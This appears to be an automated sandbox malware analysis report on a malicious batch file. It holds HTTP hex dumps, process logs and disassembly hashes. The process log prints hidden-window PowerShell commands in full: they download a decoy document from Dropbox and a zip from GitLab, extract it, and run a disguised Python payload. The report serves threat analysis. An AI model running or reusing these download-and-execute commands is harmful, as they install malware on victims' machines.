                                                                                                                                                                                  Data Ascii: YHO.PWp.1hYLaYEx8Tw.Yok2tQJL_DfLZ54dFl45.77ucW.w9YFE2Em7pQCM1ki320HH_oxov95cH_QLh3c2p6XpqeQw1jothDdx0QplGiG7hoIOjkFQlXurXIG19uVAOnffiaZvL.t_1u3gAa1kd7i4a_DFbewnfOT7yalVkXJbTTAfm1IgDHLTYwVdYVizG2knjEG4vBadt26FCHtcWq_ihQRRjtyMHyvParS..cLO8pryAsePR6dnEJT1nTi
                                                                                                                                                                                  2024-11-18 07:47:24 UTC1369INData Raw: 77 46 37 77 49 71 35 64 51 66 76 42 53 2e 4e 59 78 58 49 30 54 44 6e 4e 32 39 64 6f 76 2e 44 41 4f 67 78 4e 58 72 56 6e 7a 67 37 41 63 6f 53 5f 76 71 4a 56 34 37 70 4d 43 37 62 51 78 34 63 44 33 56 6c 72 6b 30 75 47 67 42 65 53 4f 7a 4c 71 62 41 34 64 36 35 71 4e 50 73 6d 43 57 76 76 6d 46 56 39 51 5f 6f 43 76 42 46 4c 52 6e 68 54 77 5f 39 38 46 6a 61 32 33 47 42 48 37 71 62 67 47 79 54 41 56 61 6a 65 77 31 71 6c 42 70 54 71 5f 43 36 72 59 45 4e 53 34 50 74 67 22 2c 6d 64 72 64 3a 20 22 79 72 47 69 49 76 59 4b 6c 51 78 50 49 33 64 57 63 57 31 54 6f 4a 6f 34 75 5a 37 37 53 59 78 41 52 36 4f 4c 55 66 38 55 57 6d 45 2d 31 37 33 31 39 31 36 30 34 34 2d 31 2e 32 2e 31 2e 31 2d 76 59 5a 31 43 77 6b 42 66 4c 36 37 37 30 34 36 4c 77 4f 31 76 44 48 6c 78 7a 6a 59
                                                                                                                                                                                  Data Ascii: wF7wIq5dQfvBS.NYxXI0TDnN29dov.DAOgxNXrVnzg7AcoS_vqJV47pMC7bQx4cD3Vlrk0uGgBeSOzLqbA4d65qNPsmCWvvmFV9Q_oCvBFLRnhTw_98Fja23GBH7qbgGyTAVajew1qlBpTq_C6rYENS4Ptg",mdrd: "yrGiIvYKlQxPI3dWcW1ToJo4uZ77SYxAR6OLUf8UWmE-1731916044-1.2.1.1-vYZ1CwkBfL677046LwO1vDHlxzjY
                                                                                                                                                                                  2024-11-18 07:47:24 UTC1369INData Raw: 69 38 78 44 75 75 50 42 7a 71 48 31 6a 50 48 68 65 53 36 6c 37 69 55 50 73 2e 6c 72 74 37 56 30 67 2e 79 74 4d 76 5a 38 35 58 71 49 6f 74 5f 75 62 52 65 6f 31 74 6d 69 6c 34 76 6c 6d 59 37 71 52 7a 72 31 33 68 5a 75 48 6e 4e 38 57 6c 45 46 47 6a 31 47 54 4e 74 56 38 5a 76 5f 52 5a 30 33 51 58 77 4b 44 68 4e 71 56 62 72 48 4a 7a 49 61 73 38 46 76 2e 42 5a 6e 38 33 44 68 5a 74 41 39 69 33 41 65 71 4a 48 51 49 6a 49 74 4e 70 31 4c 6f 69 64 38 5f 6f 66 2e 70 58 61 6c 75 33 30 47 57 4e 74 55 37 61 48 6b 6b 36 48 76 64 6b 76 46 4f 61 47 5f 4c 76 65 4b 42 4f 4c 39 74 49 75 4e 79 53 2e 4d 31 66 64 43 75 46 68 77 75 66 59 5a 42 4a 68 72 71 44 51 37 52 76 4a 6d 57 7a 6c 44 5f 31 4c 4f 4e 70 56 5a 62 31 30 45 6f 77 58 69 50 70 56 4d 39 2e 70 79 76 56 39 52 65 6f 6c
                                                                                                                                                                                  Data Ascii: i8xDuuPBzqH1jPHheS6l7iUPs.lrt7V0g.ytMvZ85XqIot_ubReo1tmil4vlmY7qRzr13hZuHnN8WlEFGj1GTNtV8Zv_RZ03QXwKDhNqVbrHJzIas8Fv.BZn83DhZtA9i3AeqJHQIjItNp1Loid8_of.pXalu30GWNtU7aHkk6HvdkvFOaG_LveKBOL9tIuNyS.M1fdCuFhwufYZBJhrqDQ7RvJmWzlD_1LONpVZb10EowXiPpVM9.pyvV9Reol
                                                                                                                                                                                  2024-11-18 07:47:24 UTC676INData Raw: 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e
                                                                                                                                                                                  Data Ascii: ow._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathn


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:02:47:08
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" "
                                                                                                                                                                                  Imagebase:0x7ff6d1360000
                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:02:47:08
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:02:47:08
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:chcp.com 437
                                                                                                                                                                                  Imagebase:0x7ff6162e0000
                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:find
                                                                                                                                                                                  Imagebase:0x7ff6f89b0000
                                                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:fIndstr /L /I set "C:\Users\user\Desktop\13jhsfbose.bat"
                                                                                                                                                                                  Imagebase:0x7ff75f200000
                                                                                                                                                                                  File size:36'352 bytes
                                                                                                                                                                                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:fIndstr /L /I goto "C:\Users\user\Desktop\13jhsfbose.bat"
                                                                                                                                                                                  Imagebase:0x7ff75f200000
                                                                                                                                                                                  File size:36'352 bytes
                                                                                                                                                                                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:fIndstr /L /I echo "C:\Users\user\Desktop\13jhsfbose.bat"
                                                                                                                                                                                  Imagebase:0x7ff75f200000
                                                                                                                                                                                  File size:36'352 bytes
                                                                                                                                                                                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:fIndstr /L /I pause "C:\Users\user\Desktop\13jhsfbose.bat"
                                                                                                                                                                                  Imagebase:0x7ff75f200000
                                                                                                                                                                                  File size:36'352 bytes
                                                                                                                                                                                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                  Imagebase:0x7ff6d1360000
                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:find
                                                                                                                                                                                  Imagebase:0x7ff6f89b0000
                                                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                  Imagebase:0x7ff6d1360000
                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:02:47:09
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:02:47:19
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:02:47:20
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:02:47:30
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:02:47:42
                                                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00007FF848DC09CD Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000C.00000002.2258480766.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848dc0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .@_H
                                                                                                                                                                                    • API String ID: 0-1410794216
                                                                                                                                                                                    • Opcode ID: 6cce01eeec302e300f5c2b3be873d802bea6b6d9e710acd7f191e147d4c9ba88
                                                                                                                                                                                    • Instruction ID: 66b1de8807f0a351384336e52cfe7c34e545e8ca2a5ed45a1276084594bea87b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cce01eeec302e300f5c2b3be873d802bea6b6d9e710acd7f191e147d4c9ba88
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F321231D0FB8A5FE79ABB2858552B53BE1EF462A4F0801FAD048C71E3DE189C498356
                                                                                                                                                                                    Function 00007FF848CF3641 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000C.00000002.2257988009.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848cf0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: vH
                                                                                                                                                                                    • API String ID: 0-2844672238
                                                                                                                                                                                    • Opcode ID: 1a16a248425f707e1007f3a4d93d8eabf45097ed7ae3a1ec0fd4becc05b62447
                                                                                                                                                                                    • Instruction ID: 61d81cbd015dc914265366f2e16747908acae304f35e2fa98c76d51eb1f101f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a16a248425f707e1007f3a4d93d8eabf45097ed7ae3a1ec0fd4becc05b62447
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82D16F31A1C94E9FEB98EF6CC445AE977E1FF68340F14016AD409D7296CB24E882CBC4
                                                                                                                                                                                    Function 00007FF848DC3545 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000C.00000002.2258480766.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848dc0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: dd6c11f6df03d1a93e3ec7dedf7eb0c345044754011c573ad1d2cdfa266bd4ee
                                                                                                                                                                                    • Instruction ID: c0dbb19d162d69f7bc02ef33dbb5b63bbfb72c0634f7784db62155603a269d48
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6c11f6df03d1a93e3ec7dedf7eb0c345044754011c573ad1d2cdfa266bd4ee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FD11571D1FA8A5FE7A9AB6C58196B5BBE0EF063A4F0801FAD00CC71D3DB189809C355
                                                                                                                                                                                    Function 00007FF848DC0AA7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000C.00000002.2258480766.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848dc0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ce3f8ba620910539c67f4323448fe65f43503a3f177b7128ac5e09a7d8973f6b
                                                                                                                                                                                    • Instruction ID: 4967e3bf7413b4fc6d3e032925f159a2b18443ba855c894a2bd4ad6f0c68ad95
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3f8ba620910539c67f4323448fe65f43503a3f177b7128ac5e09a7d8973f6b
                                                                                                                                                                                    • Instruction Fuzzy Hash: A931E221E1FA874FF7A9B72C18552797AD2EF426E5F4800BAD01DC31D3DE18AC088619
                                                                                                                                                                                    Function 00007FF848CF4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000C.00000002.2257988009.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848cf0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                    • Instruction ID: b01bc69e873dbe0df0819f2a2257684cd8befd660ef0f47ef0395d8608bf6ff0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA01677111CB0C4FD748EF4CE451AA5B7E0FB95364F10056DE58AC3695D736E881CB45

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00007FF848CF5E8C Relevance: .5, Instructions: 493COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000002.2363951768.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_7ff848cf0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b5e02c4feba2c9261ec2da062fb2a9dc3ba902a157e475a4b126c212fea5dc71
                                                                                                                                                                                    • Instruction ID: d71bfd5b88ba6f71f9d39368f5257ca9dfdea8b4d15c5c98cd12252716e41f1f
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5e02c4feba2c9261ec2da062fb2a9dc3ba902a157e475a4b126c212fea5dc71
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1E18130A0CA4D8FEB89EF58D445EA977E1FF68350F1441AAD449D7296CB34EC82CB85
                                                                                                                                                                                    Function 00007FF848DC354A Relevance: .4, Instructions: 440COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000002.2364527181.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_7ff848dc0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 809b56145c270dfbe39c6ac81840c4c47c7cc0ca1434f53a38fd334789807262
                                                                                                                                                                                    • Instruction ID: 9d342a4fc1de4a91fa01f7e7e03ab1197d550a43b53f5efd73c35b50660adbee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 809b56145c270dfbe39c6ac81840c4c47c7cc0ca1434f53a38fd334789807262
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71D12731E1FA895FE769AB6C58196B5BBE0EF163A4F0801FAD00DC71D3DB189809C355
                                                                                                                                                                                    Function 00007FF848DC0A12 Relevance: .4, Instructions: 372COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000002.2364527181.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_7ff848dc0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ea6e9db405c29b6a6b421a11d67a45fdd9c8610de640657bac63c13298d31541
                                                                                                                                                                                    • Instruction ID: 914728f1605994a5513ce330b8f8cfbeb52cf3490613794be7b9cfe17b582f07
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea6e9db405c29b6a6b421a11d67a45fdd9c8610de640657bac63c13298d31541
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20B12521E1EB894FE75AB72868652B53FE1EF462A4F0801FFD049C71A3DE189C09C756
                                                                                                                                                                                    Function 00007FF848DC0AA7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000002.2364527181.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_7ff848dc0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 050611274e4d0c9a862e2d353fad859309361de1a8ebb4f66234227d1b586c29
                                                                                                                                                                                    • Instruction ID: d98cb04c161852c88d9cf08991a553879bf8b39dd4753c98a99176a32cc2c9bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 050611274e4d0c9a862e2d353fad859309361de1a8ebb4f66234227d1b586c29
